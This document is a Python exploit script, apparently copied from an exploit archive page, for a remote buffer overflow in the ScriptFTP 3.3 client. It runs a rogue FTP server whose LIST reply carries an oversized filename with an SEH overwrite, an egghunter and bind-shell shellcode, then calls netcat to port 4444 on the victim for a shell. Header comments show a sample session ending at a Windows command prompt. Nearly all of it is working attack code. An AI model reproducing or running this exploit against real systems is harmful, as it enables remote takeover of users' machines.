232 lines
No EOL
8 KiB
Python
Executable file
232 lines
No EOL
8 KiB
Python
Executable file
# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)
|
|
# Date: September 20, 2011
|
|
# Author: modpr0be
|
|
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe
|
|
# Version: 3.3
|
|
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)
|
|
# CVE : -
|
|
#
|
|
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner
|
|
#
|
|
# You should create your own script to work with ScriptFTP
|
|
# for example; enable passive and get the remote directory
|
|
# on your evil ftp server.
|
|
#
|
|
# my example script:
|
|
# OPENHOST("8.8.8.8","ftp","ftp")
|
|
# SETPASSIVE(ENABLED)
|
|
# GETLIST($list,REMOTE_FILES)
|
|
# CLOSEHOST
|
|
# save it to a file with .ftp extension (eg: exploit.ftp)
|
|
|
|
# root@bt :/# python scriptftp-bof-poc.py
|
|
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC
|
|
# [*] by modpr0be[at]digital-echidna[dot]org.
|
|
# [*] thanks a lot to cyb3r.anbu | otoy :)
|
|
# =============================================
|
|
# [*] Evil FTP Server Ready
|
|
# [*] Server initiated.
|
|
# [*] Awaiting connection...
|
|
# [*] Connection created by 172.16.87.129.
|
|
# [*] Establishing session.
|
|
# [*] Pwning in progress..
|
|
# [*] This may take up 50 seconds or less.
|
|
# [!] Hunter is hunting the Egg ;)
|
|
# [!] Waiting for a shell..
|
|
# [!] 0wn3d..!
|
|
#
|
|
# Microsoft Windows XP [Version 5.1.2600]
|
|
# (C) Copyright 1985-2001 Microsoft Corp.
|
|
#
|
|
# C:\Program Files\ScriptFTP>
|
|
#
|
|
# Yes, this poc is using PASSIVE connection and it will
|
|
# take some time to establish. I love the way we wait for a shell ;)
|
|
|
|
#!/usr/bin/python
|
|
|
|
import socket
|
|
import os
|
|
import sys
|
|
import time
|
|
|
|
class ftp_server:
|
|
def __init__(self):
|
|
self.host = '0.0.0.0'
|
|
self.passive_port = 7214
|
|
self.log("""
|
|
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC
|
|
[*] by modpr0be[at]digital-echidna[dot]org
|
|
[*] thanks a lot to cyb3r.anbu | otoy :)
|
|
=============================================
|
|
[*] Evil FTP Server Ready""")
|
|
|
|
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
self.sock.bind(('', 21))
|
|
self.sock.listen(1)
|
|
|
|
a = self.passive_port/256
|
|
b = self.passive_port%256
|
|
self.tuple_port = (a, b)
|
|
self.host_join = ','.join(self.host.split('.'))
|
|
self.passive = False
|
|
|
|
self.log("[*] Server initiated.")
|
|
|
|
def log(self, msg):
|
|
print msg
|
|
|
|
def get(self):
|
|
return self.conn.recv(1024).replace('\r', '').replace('\n', '')
|
|
|
|
def getcwd(self):
|
|
return os.getcwd().split(chr(92))[-1]
|
|
|
|
def put(self, ftr):
|
|
x = {
|
|
|
|
150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),
|
|
200:" Type okay.",
|
|
220:" %s Server is ready."%self.host,
|
|
226:" Listing completed.",
|
|
227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),
|
|
230:" User logged in, proceed.",
|
|
250:' "/%s" is new cwd.'%self.getcwd(),
|
|
257:' "/%s" is cwd.'%self.getcwd(),
|
|
331:" User name okay, need password.",
|
|
502:" Command not implemented.",
|
|
551:" Requested action aborted. Page type unknown."
|
|
|
|
}[ftr]
|
|
|
|
s = '%s%s\r\n'%(ftr, x)
|
|
self.conn.send(s)
|
|
return s
|
|
|
|
def main(self):
|
|
self.log("[*] Awaiting connection...")
|
|
self.conn, addr = self.sock.accept ()
|
|
self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])
|
|
self.put(220)
|
|
self.log("[*] Pwning in progress..")
|
|
self.log("[*] This may take up 50 seconds or less.")
|
|
|
|
while 1:
|
|
try:
|
|
data = self.get().upper()
|
|
except socket.error:
|
|
self.conn.close()
|
|
self.sock.shutdown(socket.SHUT_RDWR)
|
|
raise socket.error
|
|
|
|
if data[:4] == 'USER': s = 331
|
|
elif data[:4] == 'PASS': s = 230
|
|
elif data[:3] == 'PWD': s = 257
|
|
elif data[:4] == 'TYPE': s = 200
|
|
elif data[:4] == 'PASV':
|
|
# create passive port
|
|
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
self.sock2.bind(('', self.passive_port ))
|
|
self.sock2.listen(1)
|
|
s = self.put(227)
|
|
self.conn2, addr = self.sock2.accept()
|
|
self.passive = True
|
|
s = 0 # don't routine
|
|
|
|
elif data[:3] == 'CWD':
|
|
try:
|
|
os.chdir('..%s'%data.split(' ')[-1])
|
|
s = 250
|
|
except OSError:
|
|
s = 551
|
|
|
|
elif data[:4] == 'LIST':
|
|
s = self.put(150)
|
|
s = self.passive_do(1)
|
|
s = 0 # don't routine
|
|
print "[!] Hunter is hunting the Egg ;)"
|
|
time.sleep(50)
|
|
print "[!] Waiting for a shell.."
|
|
time.sleep(2)
|
|
print "[!] 0wn3d..!\n"
|
|
os.system("nc %s 4444"%addr[0])
|
|
sys.exit()
|
|
else:
|
|
s = 502
|
|
|
|
if s:
|
|
s = self.put(s)
|
|
|
|
def passive_do(self, id):
|
|
if id == 1:
|
|
#bind to port 4444
|
|
bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"
|
|
"APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
|
|
"IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"
|
|
"XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"
|
|
"8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"
|
|
"P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"
|
|
"8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"
|
|
"MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"
|
|
"KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"
|
|
"1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"
|
|
"80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"
|
|
"U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"
|
|
"2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"
|
|
"8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"
|
|
"OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"
|
|
"TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"
|
|
"SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"
|
|
"E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"
|
|
"KQ7MCT2BO2JKPQCKOZ5A")
|
|
|
|
# 32bit egghunter from corelanc0d3r, thx ;)
|
|
egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
|
|
"IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
|
|
"8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
|
|
"ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
|
|
"HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
|
|
"SEYWKOYWA")
|
|
|
|
junk = "A" * 1746 #junk
|
|
nseh = "\x61\x62" #nseh
|
|
seh = "\x45\x5B" #seh ppr somewhere on scriptftp dir
|
|
|
|
#prepare for align
|
|
align = "\x60" #pushad
|
|
align += "\x73" #nop/align
|
|
align += "\x53" #push ebx
|
|
align += "\x73" #nop/align
|
|
align += "\x58" #pop eax
|
|
align += "\x73" #nop/align
|
|
align += "\x05\x02\x11" #add eax,0x11000200
|
|
align += "\x73" #nop/align
|
|
align += "\x2d\x01\x11" #sub eax,0x11000120
|
|
align += "\x73" #nop/align
|
|
|
|
#walking
|
|
walk = "\x50" #push eax
|
|
walk += "\x73" #nop/align
|
|
walk += "\xc3" #ret
|
|
|
|
#align again
|
|
align2 = "0t0t" + "\x73\x57\x73\x58\x73" #nop/push edi/nop/pop eax/nop
|
|
align2 += "\xb9\x1b\xaa" #mov ecx,0xaa001b00
|
|
align2 += "\xe8\x73" #add al,ch + nop
|
|
align2 += "\x50\x73\xc3" #push eax,nop,ret
|
|
|
|
sampah1 = "\x44" * 106 + "\x73" #eax+106/align nop
|
|
sampah2 = "\x42" * 544 #right after shellcode
|
|
|
|
crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1
|
|
|
|
res = """-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+crash+""".txt\r\ndrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 A\r\nrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+ crash +".txt\r\n"
|
|
|
|
self.conn2.send(res)
|
|
# self.conn2.send('\r\n') # send blank
|
|
return res
|
|
|
|
try:
|
|
ftp_server().main()
|
|
except socket.error:
|
|
print "[!] Socket is not ready, shutting down...\n" |